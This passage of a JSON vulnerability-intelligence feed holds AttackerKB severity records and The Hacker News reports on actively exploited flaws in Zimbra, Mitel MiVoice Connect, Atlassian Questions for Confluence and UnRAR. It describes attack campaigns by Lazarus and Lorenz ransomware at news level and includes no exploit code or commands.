CentOS 6). Once pax is installed, amavisd automatically prefers it over cpio.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at October 06, 2022 9:31pm UTC reported:\n\nThis is I think the 6th major issue with Zimbra this year. It\u2019s not really their fault, they use Amavis which uses `cpio` which is vulnerable to CVE-2015-1197, but the attack surface for incoming emails is HUGE.\n\nNot to mention, this is one of several vulnerabilities this year that was being exploited in the wild before being discovered, which means Zimbra is an active target for the Bad Guys.\n\nIf you\u2019re still using Zimbra, you might want to seriously reconsider. I betcha there are others, and they\u2019re probably being exploited.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T00:00:00", "type": "attackerkb", "title": "CVE-2022-41352", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1197", "CVE-2022-30333", "CVE-2022-37393", "CVE-2022-41352"], "modified": "2022-11-10T00:00:00", "id": "AKB:82991046-210F-4C54-A578-8E09BD9F6D88", "href": "https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T23:15:56", "description": "The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2022-29499", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-04-26T00:00:00", "id": "AKB:9CE495DA-1E3B-4486-85DA-2F4FAB15E355", "href": "https://attackerkb.com/topics/M1DmDykURB/cve-2022-29499", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T15:01:09", "description": "The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T00:00:00", "type": "attackerkb", "title": "CVE-2022-26138", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-20T00:00:00", "id": "AKB:8049CCA9-ACA9-4288-8493-4153794BD621", "href": "https://attackerkb.com/topics/BUK2DJ8uhl/cve-2022-26138", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T14:45:10", "description": "RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at July 18, 2022 4:55pm UTC reported:\n\nWhile we focused on Zimbra in our analysis, there are almost certainly other targets for this vulnerability that we are not aware of yet.\n\nExploiting this against Zimbra is really bad \u2013 it can be done fairly quietly and it doesn\u2019t require direct access to the server, and can easily lead to root access to the server hosting users\u2019 email. This is super urgent to patch on Zimbra!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-19T00:00:00", "type": "attackerkb", "title": "CVE-2022-30333", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-07-19T00:00:00", "id": "AKB:EFC2EE2A-9172-4B00-94C9-6CC133BD4B05", "href": "https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "thn": [{"lastseen": "2022-08-12T08:05:53", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg9qxbn7rtwp_8HhHdLMCtdFHTS9P9h30LT9JeykqY-hsQi19Y7sKajWFMyeViTZ2691A1RS21KFyOFcoNpHOwRECgwd8gscsC1zGe9BJFv8IWB92a9Xz8hfZhfJqPT6xKB-avmgK7jSEUsQK9qOpai3Bzve7V0tn8fK_PdV5GgLxYz93exTC7im01N/s728-e100/zimbra.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/08/11/cisa-adds-two-known-exploited-vulnerabilities-catalog>) two flaws to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), citing evidence of active exploitation.\n\nThe two high-severity issues relate to weaknesses in Zimbra Collaboration, both of which could be chained to achieve unauthenticated remote code execution on affected email servers -\n\n * [**CVE-2022-27925**](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>) (CVSS score: 7.2) - Remote code execution (RCE) through mboximport from authenticated user (fixed in [versions](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>) 8.8.15 Patch 31 and 9.0.0 Patch 24 released in March)\n * [**CVE-2022-37042**](<https://nvd.nist.gov/vuln/detail/CVE-2022-37042>) \\- Authentication bypass in MailboxImportServlet (fixed in [versions](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>) 8.8.15 Patch 33 and 9.0.0 Patch 26 released in August)\n\n\"If you are running a Zimbra version that is older than Zimbra 8.8.15 patch 33 or Zimbra 9.0.0 patch 26 you should update to the latest patch as soon as possible,\" Zimbra [warned](<https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/>) earlier this week.\n\nCISA has not shared any information on the attacks exploiting the flaws but cybersecurity firm Volexity [described](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) mass in-the-wild exploitation of Zimbra instances by an unknown threat actor.\n\nIn a nutshell, the attacks involve taking advantage of the aforementioned authentication bypass flaw to gain remote code execution on the underlying server by uploading arbitrary files.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhV1fby0Cn0K6lGZPpZ_qkx0XEbpXXu9JqeqYyQjSGENl8OIeWZ_NRLD3lLIk4vqar0nZaCUNSeTYYqWVwHfkK1OOzxMrjCUgzpEtGbB6YzEV1U3-C43T9bPbMWrnooZrVJwJ7dTU4DDoVBX32qrIPP9Ay9AGtmUz3HS_uj5mYw9n20cjXOo9Q3lWy/s728-e100/map.jpg>)\n\nVolexity said \"it was possible to bypass authentication when accessing the same endpoint (mboximport) used by CVE-2022-27925,\" and that the flaw \"could be exploited without valid administrative credentials, thus making the vulnerability significantly more critical in severity.\"\n\nIt also singled out over 1,000 instances globally that were backdoored and compromised using this attack vector, some of which belong to government departments and ministries; military branches; and companies with billions of dollars of revenue.\n\nThe attacks, which transpired as recently as the end of June 2022, also involved the deployment of web shells to maintain long-term access to the infected servers. Top countries with the most compromised instances include the U.S., Italy, Germany, France, India, Russia, Indonesia, Switzerland, Spain, and Poland.\n\n\"CVE-2022-27925 was originally listed as an RCE exploit requiring authentication,\" Volexity said. \"When combined with a separate bug, however, it became an unauthenticated RCE exploit that made remote exploitation trivial.\"\n\nThe disclosure comes a week after CISA added another Zimbra-related bug, [CVE-2022-27924](<https://thehackernews.com/2022/08/cisa-adds-zimbra-email-vulnerability-to.html>), to the catalog, which, if exploited, could allow attackers to steal cleartext credentials from users of the targeted instances.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-12T06:14:00", "type": "thn", "title": "Researchers Warn of Ongoing Mass Exploitation of Zimbra RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-12T06:14:20", "id": "THN:76E9C775EE4ECFF3F3F1E02BCA0BE2F2", "href": "https://thehackernews.com/2022/08/researchers-warn-of-ongoing-mass.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T08:12:43", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEisdMxSKKuA8oFcW5VApTuLA1_8qiv7WX85vjSnbXrcAc0EYjyxMAq6sl0EFXsgEjtDNIvFeNjVR-BNMd49_sz7_yTIwL4oRVpaYD9mIytX_B4fheBaZrpcevoiSWZrLQy6vtPece3x2HNCMNCqCHmhCmWo1FLFIqKojSzrFhInuEwvu2_dA8KnURVj/s728-e365/ms.jpg>)\n\nA new intelligence gathering campaign linked to the prolific North Korean state-sponsored Lazarus Group leveraged known security flaws in unpatched Zimbra devices to compromise victim systems.\n\nThat's according to Finnish cybersecurity company WithSecure (formerly F-Secure), which codenamed the incident **No Pineapple** in reference to an error message that's used in one of the backdoors.\n\nTargets of the malicious operation included a healthcare research organization in India, the chemical engineering department of a leading research university, as well as a manufacturer of technology used in the energy, research, defense, and healthcare sectors, suggesting an attempt to breach the supply chain.\n\nRoughly 100GB of data is estimated to have been exported by the hacking crew following the compromise of an unnamed customer, with the digital break-in likely taking place in the third quarter of 2022.\n\n\"The threat actor gained access to the network by exploiting a vulnerable Zimbra mail server at the end of August,\" WithSecure said in a [detailed technical report](<https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector>) shared with The Hacker News.\n\nThe security flaws used for initial access are [CVE-2022-27925 and CVE-2022-37042](<https://thehackernews.com/2022/08/researchers-warn-of-ongoing-mass.html>), both of which could be abused to gain remote code execution on the underlying server.\n\nThis step was succeeded by the installation of web shells and the exploitation of local privilege escalation vulnerability in the Zimbra server (i.e., [Pwnkit](<https://thehackernews.com/2022/06/cisa-warns-of-active-exploitation-of.html>) aka CVE-2021-4034), thereby enabling the threat actor to harvest sensitive mailbox data.\n\nSubsequently, in October 2022, the adversary is said to have carried out lateral movement, reconnaissance, and ultimately deployed backdoors such as Dtrack and an updated version of GREASE.\n\n[GREASE](<https://www.cisa.gov/uscert/ncas/alerts/aa20-301a>), which has been attributed as the handiwork of another North Korea-affiliated threat cluster called [Kimsuky](<https://thehackernews.com/2022/07/north-korean-hackers-using-malicious.html>), comes with [capabilities](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>) to create new administrator accounts with remote desktop protocol (RDP) privileges while also skirting firewall rules.\n\nDtrack, on the other hand, has been employed in [cyber assaults](<https://thehackernews.com/2022/11/north-korean-hackers-targeting-europe.html>) aimed at a variety of industry verticals, and also in financially motivated attacks involving the use of [Maui ransomware](<https://thehackernews.com/2022/08/experts-uncover-details-on-maui.html>).\n\n\"At the beginning of November, Cobalt Strike [command-and-control] beacons were detected from an internal server to two threat actor IP addresses,\" researchers Sami Ruohonen and Stephen Robinson pointed out, adding the data exfiltration occurred from November 5, 2022, through November 11, 2022.\n\nAlso used in the intrusion were tools like Plink and 3Proxy to create a proxy on the victim system, echoing [previous findings](<https://thehackernews.com/2022/09/north-korean-lazarus-hackers-targeting.html>) from Cisco Talos about Lazarus Group's attacks targeting energy providers.\n\nBesides relying solely on an IP address-based infrastructure without any domain names, a crucial link exposing the campaign's links to North Korea stems from a connection originating from an IP address located in the country (175.45.176[.]27) to the patient zero server.\n\n[North Korea-backed hacking groups](<https://www.mandiant.com/resources/blog/mapping-dprk-groups-to-government>) have had a busy 2022, conducting a series of both espionage-driven attacks and [cryptocurrency heists](<https://thehackernews.com/2023/01/fbi-says-north-korean-hackers-behind.html>) that align with the regime's strategic priorities.\n\nMost recently, the BlueNoroff cluster, also known by the names APT38, Copernicium, Stardust Chollima, and TA444, was [connected](<https://thehackernews.com/2023/01/north-korean-hackers-turn-to-credential.html>) to wide-ranging credential harvesting attacks aimed at education, financial, government, and healthcare sectors.\n\n\"North Korea-linked hackers such as those in cybercriminal syndicate Lazarus Group have been by far the most prolific cryptocurrency hackers over the last few years,\" blockchain analytics firm Chainalysis [said](<https://blog.chainalysis.com/reports/2022-biggest-year-ever-for-crypto-hacking/>), calling 2022 the \"biggest year ever for crypto hacking.\"\n\nIn 2022 alone, the threat actors have been accused of being responsible for $1.65 billion worth of cryptocurrency theft, out of which $1.1 billion originated from hacks of DeFi protocols. A total of $3.8 billion was stolen from crypto businesses during the year, up from $3.3 billion in 2021.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-02T09:45:00", "type": "thn", "title": "North Korean Hackers Exploit Unpatched Zimbra Devices in 'No Pineapple' Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4034", "CVE-2022-27925", "CVE-2022-37042"], "modified": "2023-02-03T07:08:18", "id": "THN:542C8086F46B453764514414E6C59C5E", "href": "https://thehackernews.com/2023/02/north-korean-hackers-exploit-unpatched.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T16:23:00", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiDPJ-KCPqu4BVMUHJyRuEsKC9Ws9zevg9s4jYY5kHnf0eMU8S8UX-cdQ0WNuv7siJwQVXJLz9zyqkvY55zqjNUEv3cfLHsCuaAro3-5TZm73jMC3vXQMyQWhRd_C9qonYk8XHm6CoqWUC2wRjRO8_5DxD_D8l1i_qF5s8cS5O6M78wB0VI_PbUBL8F/s728-e100/ransomware.jpg>)\n\nThe operators behind the Lornenz ransomware operation have been observed exploiting a now-patched critical security flaw in Mitel MiVoice Connect to obtain a foothold into target environments for follow-on malicious activities.\n\n\"Initial malicious activity originated from a Mitel appliance sitting on the network perimeter,\" researchers from cybersecurity firm Arctic Wolf [said](<https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/>) in a report published this week.\n\n\"Lorenz exploited [CVE-2022-29499](<https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002>), a remote code execution vulnerability impacting the Mitel Service Appliance component of MiVoice Connect, to obtain a reverse shell and subsequently used [Chisel](<https://github.com/jpillora/chisel>) as a tunneling tool to pivot into the environment.\"\n\nLorenz, like many other ransomware groups, is known for double extortion by exfiltrating data prior to encrypting systems, with the actor targeting small and medium businesses (SMBs) located in the U.S., and to a lesser extent in China and Mexico, since at least February 2021.\n\nCalling it an \"ever-evolving ransomware,\" Cybereason [noted](<https://www.cybereason.com/blog/research/cybereason-vs.-lorenz-ransomware>) that Lorenz \"is believed to be a rebranding of the '.sZ40' ransomware that was discovered in October 2020.\"\n\nThe weaponization of Mitel VoIP appliances for ransomware attacks mirrors recent findings from CrowdStrike, which [disclosed](<https://thehackernews.com/2022/06/hackers-exploit-mitel-voip-zero-day-bug.html>) details of a ransomware intrusion attempt that leveraged the same tactic to achieve remote code execution against an unnamed target.\n\nMitel VoIP products are also a [lucrative entry point](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>) in light of the fact that there are nearly 20,000 internet-exposed devices online, as [revealed](<https://twitter.com/GossiTheDog/status/1540309810176217088>) by security researcher Kevin Beaumont, rendering them vulnerable to malicious attacks.\n\nIn one Lorenz ransomware attack investigated by Arctic Wolf, the threat actors weaponized the remote code execution flaw to establish a reverse shell and download the Chisel proxy utility.\n\nThis implies that the initial access was either facilitated with the help of an initial access broker ([IAB](<https://thehackernews.com/2022/03/google-uncovers-initial-access-broker.html>)) that's in possession of an exploit for CVE-2022-29499 or that the threat actors have the ability to do so themselves. \n\nWhat's also notable is that the Lorenz group waited for almost a month after obtaining initial access to conduct post-exploitation actions, including establishing persistence by means of a web shell, harvesting credentials, network reconnaissance, privilege escalation, and lateral movement.\n\nThe compromise eventually culminated in the exfiltration of data using FileZilla, following which the hosts were encrypted using Microsoft's BitLocker service, underscoring the [continued abuse](<https://thehackernews.com/2022/09/microsoft-warns-of-ransomware-attacks.html>) of living-off-the-land binaries (LOLBINs) by adversaries.\n\n\"Monitoring just critical assets is not enough for organizations,\" the researchers said, adding \"security teams should monitor all externally facing devices for potential malicious activity, including VoIP and IoT devices.\"\n\n\"Threat actors are beginning to shift targeting to lesser known or monitored assets to avoid detection.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T14:04:00", "type": "thn", "title": "Lorenz Ransomware Exploit Mitel VoIP Systems to Breach Business Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-09-14T14:04:33", "id": "THN:065BFC8E7532E662AE90BB82F405B132", "href": "https://thehackernews.com/2022/09/lorenz-ransomware-exploit-mitel-voip.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T07:00:49", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiEecCIZ-XaRJ4zcsuHaTxv40ceAY7a-zwUbCwG5pavcIkynNfkEL5b0bk3LuyI1j93_OpxDVhmeq2JIDgf2F5gePc20N6z3BLfb8ACE-Hs8BRt0o_lGbsdvT1pJhsBkfeBjvP-oakItq7nm9H28Bo9TQREhjN8EA14vZTuUU3vCCGPWgZ9DEstAMmf/s728-e100/cisa.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/07/29/cisa-adds-one-known-exploited-vulnerability-catalog>) the recently disclosed Atlassian security flaw to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.\n\nThe vulnerability, tracked as [CVE-2022-26138](<https://thehackernews.com/2022/07/atlassian-releases-patch-for-critical.html>), concerns the use of hard-coded credentials when the Questions For Confluence app is enabled in Confluence Server and Data Center instances.\n\n\"A remote unauthenticated attacker can use these credentials to log into Confluence and access all content accessible to users in the confluence-users group,\" CISA [notes](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in its advisory.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj0HlXLLx13DKw6KdL9aiyLzkfseKk26WHbECW9EuVAK8HemGF60r4yqvMLbBNmg2C7pxYyzORkxlDkvZNDNlX8XiSd69Eafk_2BLHONWx_a48pMVrF_79sQCg0dubLIL_rH6rjdVuD0lmtcPt11KVakdJCUlX6MSu833QUV4IexS8mTDkDoUAvH8HUaA/s728-e100/cisa.jpg>)\n\nDepending on the page restrictions and the information a company has in Confluence, successful exploitation of the shortcoming could lead to the disclosure of sensitive information.\n\nAlthough the bug was addressed by the Australian software company last week in versions 2.7.38 and 3.0.5, it has since come [under active exploitation](<https://thehackernews.com/2022/07/latest-critical-atlassian-confluence.html>), cybersecurity firm Rapid7 disclosed this week.\n\n\"Exploitation efforts at this point do not seem to be very widespread, though we expect that to change,\" Erick Galinkin, principal AI researcher at Rapid7, told The Hacker News.\n\n\"The good news is that the vulnerability is in the Questions for Confluence app and _not_ in Confluence itself, which reduces the attack surface significantly.\"\n\nWith the flaw now added to the catalog, Federal Civilian Executive Branch (FCEB) in the U.S. are mandated to apply patches by August 19, 2022, to reduce their exposure to cyberattacks.\n\n\"At this point, the vulnerability has been public for a relatively short amount of time,\" Galinkin noted. \"Coupled with the absence of meaningful post-exploitation activity, we don't yet have any threat actors attributed to the attacks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-07-30T03:54:00", "type": "thn", "title": "CISA Warns of Atlassian Confluence Hard-Coded Credential Bug Exploited in Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-02T06:42:46", "id": "THN:908A39F901145B6FD175B16E95137ACC", "href": "https://thehackernews.com/2022/07/cisa-warns-of-atlassian-confluence-hard.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-29T03:59:30", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjkxSAMgSsFZhb4DyOrv7jlV3A4nb55euT83HxRQMejOiw7UHuT9uTYns_ngLd4U6KF7vN-KarRobTWnwkATG6Q2ql1xpYPHfSvB-iJn8pY0T3rfaRpCwyerROalVbwZK4317SC19907zo6BS65jDRzsVx18rjEfxA_oVj6wzdoEkyJJAI4Q1JxsbJl/s728-e100/Atlassian-Confluence.jpg>)\n\nA week after Atlassian rolled out patches to contain a critical flaw in its Questions For Confluence app for Confluence Server and Confluence Data Center, the shortcoming has now come under active exploitation in the wild.\n\nThe bug in question is [CVE-2022-26138](<https://thehackernews.com/2022/07/atlassian-releases-patch-for-critical.html>), which concerns the use of a hard-coded password in the app that could be exploited by a remote, unauthenticated attacker to gain unrestricted access to all pages in Confluence.\n\nThe real-world exploitation follows the release of the hard-coded credentials on Twitter, prompting the Australian software company to prioritize patches to mitigate potential threats targeting the flaw.\n\n\"Unsurprisingly, it didn't take long [...] to observe exploitation once the hard-coded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks,\" Rapid7 security researcher Glenn Thorpe [said](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgQF8uoUiufKEleM-yHfQ0lN3WghNEStj2b_QKvuWRV2YnIQm1QmcjsY7RPKKQWQgQ1fuvJ67SI7p4fiY6xW052wY4BZC3Wi5JyVU3EL-XCESStOGZLE2kSoL9gGC-Mz_xbNZ5SrfcW22ED9SF4L5pJUBB1xCQn5zYlws4mPxknxGGYChZ9xJ4m625R/s728-e100/app.jpg>)\n\nIt's worth noting that the bug only exists when the Questions for Confluence app is enabled. That said, uninstalling the Questions for Confluence app does not remediate the flaw, as the created account does not get automatically removed after the app has been uninstalled.\n\nUsers of the affected product are advised to update their on-premise instances to the latest versions (2.7.38 and 3.0.5) as soon as possible, or take steps to disable/delete the account.\n\nThe development also arrives as Palo Alto Networks, in its [2022 Unit 42 Incident Response Report](<https://www.paloaltonetworks.com/unit42/2022-incident-response-report>), found that threat actors are scanning for vulnerable endpoints within 15 minutes of public disclosure of a new security flaw.\n\n \n\n\nFound this article interesting? Follow THN on 